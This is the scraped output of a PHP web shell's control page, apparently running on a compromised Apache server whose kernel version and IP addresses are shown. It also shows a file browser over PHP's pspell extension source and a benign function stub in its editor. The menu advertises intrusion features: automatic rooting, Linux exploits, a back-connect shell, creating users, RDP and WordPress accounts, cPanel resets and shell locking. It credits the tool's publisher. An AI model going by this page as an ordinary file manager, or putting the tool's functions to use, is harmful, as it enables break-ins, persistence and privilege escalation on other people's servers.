Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.133.113.101
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
82 /
src /
ext /
pspell /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
19
B
-rw-r--r--
config.m4
1.15
KB
-rw-r--r--
config.w32
448
B
-rw-r--r--
php_pspell.h
1.29
KB
-rw-r--r--
pspell.c
22.13
KB
-rw-r--r--
pspell.stub.php
2.18
KB
-rw-r--r--
pspell_arginfo.h
6.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pspell.stub.php
<?php /** @generate-class-entries */ namespace PSpell { /** * @strict-properties * @not-serializable */ final class Dictionary {} /** * @strict-properties * @not-serializable */ final class Config {} } namespace { function pspell_new(string $language, string $spelling = "", string $jargon = "", string $encoding = "", int $mode = 0): PSpell\Dictionary|false {} function pspell_new_personal( string $filename, string $language, string $spelling = "", string $jargon = "", string $encoding = "", int $mode = 0 ): PSpell\Dictionary|false {} function pspell_new_config(PSpell\Config $config): PSpell\Dictionary|false {} function pspell_check(PSpell\Dictionary $dictionary, string $word): bool {} /** * @return array<int, string>|false * @refcount 1 */ function pspell_suggest(PSpell\Dictionary $dictionary, string $word): array|false {} function pspell_store_replacement(PSpell\Dictionary $dictionary, string $misspelled, string $correct): bool {} function pspell_add_to_personal(PSpell\Dictionary $dictionary, string $word): bool {} function pspell_add_to_session(PSpell\Dictionary $dictionary, string $word): bool {} function pspell_clear_session(PSpell\Dictionary $dictionary): bool {} function pspell_save_wordlist(PSpell\Dictionary $dictionary): bool {} function pspell_config_create(string $language, string $spelling = "", string $jargon = "", string $encoding = ""): PSpell\Config {} function pspell_config_runtogether(PSpell\Config $config, bool $allow): bool {} function pspell_config_mode(PSpell\Config $config, int $mode): bool {} function pspell_config_ignore(PSpell\Config $config, int $min_length): bool {} function pspell_config_personal(PSpell\Config $config, string $filename): bool {} function pspell_config_dict_dir(PSpell\Config $config, string $directory): bool {} function pspell_config_data_dir(PSpell\Config $config, string $directory): bool {} function pspell_config_repl(PSpell\Config $config, string $filename): bool {} function pspell_config_save_repl(PSpell\Config $config, bool $save): bool {} }
Close